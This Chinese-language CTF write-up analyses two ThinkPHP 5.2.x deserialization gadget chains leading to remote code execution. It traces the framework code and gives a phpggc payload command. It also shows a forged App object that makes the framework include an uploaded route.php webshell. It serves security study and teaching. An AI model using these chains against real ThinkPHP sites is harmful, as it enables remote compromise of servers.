0x00 前言
上周参与了N1CTF,里面有一道关于thinkphp5的反序列化漏洞的利用。记录一下关于该反序列化的利用链分析。
后文主要包括两条链的利用分析(一条是我找的,也是题目的预期解,另一条是wonderkun师傅找的非预期解)
0x01 环境准备
这里就不直接用题目的环境了,采用composer直接安装5.2.*-dev版本
composer create-project topthink/think=5.2.x-dev v5.2
0x02 利用链分析
背景回顾
tp5在我印象里反序列化的利用链存在一个Windows类的任意文件删除,但是在这篇文章的启示下,也算是找到了一条新的路(关于__toString的触发方式,除了字符串拼接的方式,还可以利用PHP自带函数参数的强制转换)。
这篇文章的利用链最后用到了5.1.37版本think/Request.php的 __call函数,该函数的调用函数名可控,所以可以导致任意调用其他的类函数。而在5.2.x版本不存在这样的一个__call函数,这意味着我们需要重新找一个最终达成命令执行的函数调用(__call函数前的利用链仍然可用)。
那么接下来,我们来看看5.2.x新的利用链吧:)
think/model/concern/Attribute.php getValue可函数动态调用函数(题目的预期解)
由于5.1.37__call函数前的利用链仍然存在于5.2.x版本,这里就不再详述了。
先来看一下Conversion类的toArray函数
public function toArray(): array
{
// ...
// 合并关联数据
$data = array_merge($this->data, $this->relation);
foreach ($data as $key => $val) {
if ($val instanceof Model || $val instanceof ModelCollection) {
// ...
} elseif (isset($this->visible[$key])) {
$item[$key] = $this->getAttr($key);// relation和visible存在同一个key就行
// ...
}
// ...
去掉了无关的代码,这里$this->visible、$this->relation均可控,可伪造数据进入getAttr函数
public function getAttr(string $name)
{
// ...
return $this->getValue($name, $value, $relation);
}
protected function getValue(string $name, $value, bool $relation = false)
{
// 检测属性获取器
$fieldName = $this->getRealFieldName($name);// 直接返回$name的值
// ...
if (isset($this->withAttr[$fieldName])) {
// ...
$closure = $this->withAttr[$fieldName]; // withAttr内容可控
$value = $closure($value, $this->data); // 动态调用函数
// ...
直接关注getValue函数,该函数可动态调用函数,并且调用函数、函数参数均可控。所以接下来有两种方法,第一种是找一个符合条件的php函数,另一种是利用tp自带的SerializableClosure调用,来看一下第二种。
\Opis\Closure可用于序列化匿名函数,使得匿名函数同样可以进行序列化操作。这意味着我们可以序列化一个匿名函数,然后交由上述的$closure($value, $this->data)调用执行。
$func = function(){phpinfo();};
$closure = new \Opis\Closure\SerializableClosure($func);
$closure($value, $this->data);// 这里的参数可以不用管
以上述代码为例,将调用phpinfo函数。
到此为止,我们分析完了整一个调用流程,回顾一下
- vendor/topthink/framework/src/think/process/pipes/Windows.php
__destruct ->removeFiles ->file_exists 强制转化字符串filename,这里的filename可控 可触发__toString函数,下一步找可利用的__toString - vendor/topthink/framework/src/think/model/concern/Conversion.php __toString -> toJson -> toArray创造符合条件的relation和visible-> getAttr 下一步调用vendor/topthink/framework/src/think/model/concern/Attribute.php的getValue函数
- vendor/topthink/framework/src/think/model/concern/Attribute.php getValue -> $closure动态调用函数,且该内容可控 下一步利用有两种,一种找符合的php函数,另一种利用tp自带的SerializableClosure调用
- vendor/opis/closure/src/SerializableClosure.php 构造可利用的匿名函数
我把exp集成到了phpggc上,使用如下命令即可生成
./phpggc -u ThinkPHP/RCE1 'phpinfo();'
这里由于用到了SerializableClosure,需要使用编码器编码,不可直接输出拷贝利用。
think/Db.php __call函数可实例化任意类(题目的非预期解)
前面说到5.1.37版本的利用链的__call函数,在5.2.x版本没办法用了。但是从__destruct到__call的链路是通的,我们只需要重新找一个可用的__call函数即可。
来看一下vendor/topthink/framework/src/think/Db.php的__call函数
public function __call($method, $args)
{
$class = $this->config['query'];
$query = new $class($this->connection);
return call_user_func_array([$query, $method], $args);
}
$this->config和$this->connection均可控,这意味着我们可以实例化任意符合条件的类,这里找了think\Url
public function __construct(App $app, array $config = [])
{
$this->app = $app;
$this->config = $config;
if (is_file($app->getRuntimePath() . 'route.php')) {
// 读取路由映射文件
$app->route->import(include $app->getRuntimePath() . 'route.php');
}
}
该构造器引入了RuntimePath下的route.php文件,因为这道题是允许上传文件的,所以只要在可上传的目录下上传一个route.php的webshell即可。至于RuntimePath,$app为可控变量,直接修改$runtimePath的内容即可。
我们直接构造App对象为
class App{
protected $runtimePath;
public function __construct(string $rootPath = ''){
$this->rootPath = $rootPath;
$this->runtimePath = "/tmp/";
$this->route = new \think\route\RuleName();
}
}
这个构造思路太溜了,膜一波:)
整理一下过程
- vendor/topthink/framework/src/think/process/pipes/Windows.php
__destruct ->removeFiles ->file_exists 强制转化字符串filename,这里的filename可控 可触发__toString函数,下一步找可利用的__toString - vendor/topthink/framework/src/think/model/concern/Conversion.php
- __toString -> toJson -> toArray->appendAttrToArray->$relation调用不存在的函数,触发__call
- vendor/topthink/framework/src/think/Db.php
- __call -> new $class($this->connection) 调用任意类的__construct函数
- vendor/topthink/framework/src/think/Url.php
- 构造App类,达到include任意文件的效果